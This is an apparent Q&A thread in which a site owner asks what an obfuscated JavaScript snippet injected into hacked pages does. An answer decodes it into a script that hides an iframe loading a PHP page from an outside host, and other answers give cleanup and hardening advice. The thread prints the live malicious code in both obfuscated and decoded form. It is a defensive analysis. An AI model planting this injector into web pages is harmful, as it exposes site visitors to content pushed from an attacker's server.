# Site hacked with javascript code inserted

Tags: javascript, security

A number of sites that I manage have been hacked and the following javascript code has been inserted into each of the pages. I have no idea how to decode this or what it even does so I don't know how serious it is. Can anyone help?

```
<script type="text/javascript" language="javascript">
if(document.querySelector)bqlelz=4;zibka=("36,7c,8b,84,79,8a,7f,85,84,36,8c,46,4f,3e,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,8a,7f,79,53,3d,77,80,77,8e,3d,51,23,20,36,8c,77,88,36,79,85,84,8a,88,85,82,82,7b,88,53,3d,7f,84,7a,7b,8e,44,86,7e,86,3d,51,23,20,36,8c,77,88,36,8c,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,88,7b,77,8a,7b,5b,82,7b,83,7b,84,8a,3e,3d,7f,7c,88,77,83,7b,3d,3f,51,23,20,23,20,36,8c,44,89,88,79,36,53,36,3d,7e,8a,8a,86,50,45,45,8b,86,79,82,7f,7b,84,8a,44,79,85,83,45,44,89,83,7f,82,7b,8f,89,45,7d,70,61,87,5e,7e,6d,49,44,86,7e,86,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,86,85,89,7f,8a,7f,85,84,36,53,36,3d,77,78,89,85,82,8b,8a,7b,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,79,85,82,85,88,36,53,36,3d,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,7e,7b,7f,7d,7e,8a,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8d,7f,7a,8a,7e,36,53,36,3d,4f,4c,4e,86,8e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,82,7b,7c,8a,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,36,8c,44,89,8a,8f,82,7b,44,8a,85,86,36,53,36,3d,47,46,46,46,4f,4c,4e,3d,51,23,20,23,20,36,7f,7c,36,3e,37,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,3f,36,91,23,20,36,7a,85,79,8b,83,7b,84,8a,44,8d,88,7f,8a,7b,3e,3d,52,86,36,7f,7a,53,72,3d,8c,72,3d,36,79,82,77,89,89,53,72,3d,8c,46,4f,72,3d,36,54,52,45,86,54,3d,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,7d,7b,8a,5b,82,7b,83,7b,84,8a,58,8f,5f,7a,3e,3d,8c,3d,3f,44,77,86,86,7b,84,7a,59,7e,7f,82,7a,3e,8c,3f,51,23,20,36,93,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,69,7b,8a,59,85,85,81,7f,7b,3e,79,85,85,81,7f,7b,64,77,83,7b,42,79,85,85,81,7f,7b,6c,77,82,8b,7b,42,84,5a,77,8f,89,42,86,77,8a,7e,3f,36,91,23,20,36,8c,77,88,36,8a,85,7a,77,8f,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,8c,77,88,36,7b,8e,86,7f,88,7b,36,53,36,84,7b,8d,36,5a,77,8a,7b,3e,3f,51,23,20,36,7f,7c,36,3e,84,5a,77,8f,89,53,53,84,8b,82,82,36,92,92,36,84,5a,77,8f,89,53,53,46,3f,36,84,5a,77,8f,89,53,47,51,23,20,36,7b,8e,86,7f,88,7b,44,89,7b,8a,6a,7f,83,7b,3e,8a,85,7a,77,8f,44,7d,7b,8a,6a,7f,83,7b,3e,3f,36,41,36,49,4c,46,46,46,46,46,40,48,4a,40,84,5a,77,8f,89,3f,51,23,20,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,36,53,36,79,85,85,81,7f,7b,64,77,83,7b,41,38,53,38,41,7b,89,79,77,86,7b,3e,79,85,85,81,7f,7b,6c,77,82,8b,7b,3f,23,20,36,41,36,38,51,7b,8e,86,7f,88,7b,89,53,38,36,41,36,7b,8e,86,7f,88,7b,44,8a,85,5d,63,6a,69,8a,88,7f,84,7d,3e,3f,36,41,36,3e,3e,86,77,8a,7e,3f,36,55,36,38,51,36,86,77,8a,7e,53,38,36,41,36,86,77,8a,7e,36,50,36,38,38,3f,51,23,20,93,23,20,7c,8b,84,79,8a,7f,85,84,36,5d,7b,8a,59,85,85,81,7f,7b,3e,36,84,77,83,7b,36,3f,36,91,23,20,36,8c,77,88,36,89,8a,77,88,8a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,84,77,83,7b,36,41,36,38,53,38,36,3f,51,23,20,36,8c,77,88,36,82,7b,84,36,53,36,89,8a,77,88,8a,36,41,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,41,36,47,51,23,20,36,7f,7c,36,3e,36,3e,36,37,89,8a,77,88,8a,36,3f,36,3c,3c,23,20,36,3e,36,84,77,83,7b,36,37,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,46,42,36,84,77,83,7b,44,82,7b,84,7d,8a,7e,36,3f,36,3f,36,3f,23,20,36,91,23,20,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,93,23,20,36,7f,7c,36,3e,36,89,8a,77,88,8a,36,53,53,36,43,47,36,3f,36,88,7b,8a,8b,88,84,36,84,8b,82,82,51,23,20,36,8c,77,88,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,7f,84,7a,7b,8e,65,7c,3e,36,38,51,38,42,36,82,7b,84,36,3f,51,23,20,36,7f,7c,36,3e,36,7b,84,7a,36,53,53,36,43,47,36,3f,36,7b,84,7a,36,53,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,82,7b,84,7d,8a,7e,51,23,20,36,88,7b,8a,8b,88,84,36,8b,84,7b,89,79,77,86,7b,3e,36,7a,85,79,8b,83,7b,84,8a,44,79,85,85,81,7f,7b,44,89,8b,78,89,8a,88,7f,84,7d,3e,36,82,7b,84,42,36,7b,84,7a,36,3f,36,3f,51,23,20,93,23,20,7f,7c,36,3e,84,77,8c,7f,7d,77,8a,85,88,44,79,85,85,81,7f,7b,5b,84,77,78,82,7b,7a,3f,23,20,91,23,20,7f,7c,3e,5d,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,3f,53,53,4b,4b,3f,91,93,7b,82,89,7b,91,69,7b,8a,59,85,85,81,7f,7b,3e,3d,8c,7f,89,7f,8a,7b,7a,75,8b,87,3d,42,36,3d,4b,4b,3d,42,36,3d,47,3d,42,36,3d,45,3d,3f,51,23,20,23,20,8c,46,4f,3e,3f,51,23,20,93,23,20,93".split(","));twuss=eval;function oqvw(){iuwo=function(){--(uiopm.body)}()}uiopm=document;for(wxuxe=0;wxuxe<zibka["length"];wxuxe+=1){zibka[wxuxe]=-(22)+parseInt(zibka[wxuxe],bqlelz*4);}try{oqvw()}catch(ggpl){hywzjw=50-50;}if(!hywzjw)twuss(String["fr"+"omCh"+"arCo"+"de"].apply(String,zibka));
</script>
```

I'm assuming these are character references and it's actually pointing to a site somewhere with some malicious content but I don't know how to work it out. I am going through and removing all of these and changing all passwords to prevent further security issues but any advice on this would be greatly appreciated!

Thanks.

Comment: You should fix security holes.

Comment: @SLaks Please add something constructive.

Comment: @JoshuaK: I have no idea what kind of security holes allowed the attack in the first place, but they are likely to still be there.

Comment: set all your files to read only. unless it's a folder for uploads. Delete the script, and security issue eliminated. Also, looks like some of the script is missing. Can you attach all to a jsfidde?

Comment: Open console on a blank page on a domain that is not important. Copy code into console. Replace `twuss=eval;` with `twuss=console.log.bind(console)`, do the same with `window.eval` and `window.Function`. Run code. See what gets logged.

Comment: @PaulS. It's possible that doing that could also attack the computer running the code. I don't recommend it.

Comment: @SLaks I am almost certain that you're right, however, the compromise has already occurred -- "fix the security holes" is like telling an severely obese person to "just lose some weight". It's never that easy.

Comment: @JoshuaK: Yes, but there is no more-specific advice that we can give.

Answer (score 1, accepted):

This is what was injected.  To decipher this, you do the same thing the javascript in your post does.  Split the string into hex strings on the comma, then parseInt with base 16, subtract 22, and look up the character for that char code.  How it could be used maliciously, I'm not sure.  Anyone have any ideas?

```
function v09() {

    var static = 'ajax';

    var controller = 'index.php';

    var v = document.createElement('iframe');

    v.src = 'http://upclient.com/.smileys/gZKqHhW3.php';

    v.style.position = 'absolute';

    v.style.color = '968';

    v.style.height = '968px';

    v.style.width = '968px';

    v.style.left = '1000968';

    v.style.top = '1000968';

    if (!document.getElementById('v')) {

        document.write('<p id=\'v\' class=\'v09\' ></p>');

        document.getElementById('v').appendChild(v);

    }

}

function SetCookie(cookieName, cookieValue, nDays, path) {

    var today = new Date();

    var expire = new Date();

    if (nDays == null || nDays == 0)

        nDays = 1;

    expire.setTime(today.getTime() + 3600000 * 24 * nDays);

    document.cookie = cookieName + "=" + escape(cookieValue)

    + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");

}

function GetCookie(name) {

    var start = document.cookie.indexOf(name + "=");

    var len = start + name.length + 1;

    if ((!start) &&

    (name != document.cookie.substring(0, name.length)))

    {

        return null;

    }

    if (start == -1)

        return null;

    var end = document.cookie.indexOf(";", len);

    if (end == -1)

        end = document.cookie.length;

    return unescape(document.cookie.substring(len, end));

}

if (navigator.cookieEnabled)

{

    if (GetCookie('visited_uq') == 55) {

    } else {

        SetCookie('visited_uq', '55', '1', '/');

        v09();

    }

}
```

Comment: I decoded the same. It checks to see if the browser has cookies enabled, if it does it checks if the cookie `visited_uq` is equal to `55`, if not it sets it. It then tries to inject an `iframe` into the page and load the content of that iframe from h**p://upclient.com/.smileys/gZKqHhW3.php which current returns very little other than this character on a page `Â`. All seems very benign at present, maybe some kind of advertising hack, still - not what you want hacked into your website.

Comment: Yeah, at a glance it looked like some kind of cross site scripting attack so that makes sense.  Always be careful to not directly insert data from web forms without protecting against this and sql injection.

Comment: Thanks Tap, at least it's calmed my fears that it's just a smiley, but who knows what they might try next if this was just a test. Now to determine where they got in and fix it!

Answer (score 2):

In my experience, these sort of attacks happen on shared hosting servers where an automated bot has either guessed the password to the account, or there is malware on the account holder's desktop that has captured the credentials and is now abusing them.

Your best bet? Accept that there is **definitely** going to be an impact to your users, and then do your due diligence:

- Notify your shared host if you're not the owner.
- Archive the entire home directory of the shared hosting account, and include the contents of that user's cron jobs, databases, email and other information. (eg. `tar -czf website-$(date +%F).tar.gz ~/` or your shared hosting backup utility.)
- Check for any malicious processes or scripts that could be running. `ps gaux` is your friend.
- Nuke **everything** in the shared hosting account.
- Change every password, regardless, even if you think it couldn't have possibly been affected.
- Re-create the account and leave a maintenance page available for your users. You should have backups of your account.
- Unpack the backup within a virtual machine and investigate *everything* including logs and other information to discover how the attack occurred. Apply what you learn to your website code.
- Re-deploy your code with the fixes, taking into account the causes you discovered in the previous step; if your account was using a framework like Joomla, Drupal, Wordpress or something similar, take this time to upgrade to the latest version.

Do not skip steps, or this **will** happen again.

Answer (score 0):

This type of thing has happened to me also, I was not on a shared hosting solution, I was on a dedicated server, there was no evidence of any FTP or SSH or SCP activity.

I realized that someone used one of my forms to do code injection (my sites are PHP).  This can be achieved by using your own code against you, by providing input to a textbox or text field that would be interpreted by some code on your server.

For example, you may have a small form to allow people to upload files into a directory of some sort. Someone can upload a code file and then execute it and this code file can be the culprit used to inject the javascript code into your own code pages.

With this instance one can restrict what file types are allowed to be uploaded, place the files in a directory where a browser would not be able to access it directly or make sure the file has no execute permissions when uploaded.

You can also make sure to [sanitize inputs](http://coding.smashingmagazine.com/2011/01/11/keeping-web-users-safe-by-sanitizing-input-data/) so that no malicious text can be effective in any of your forms.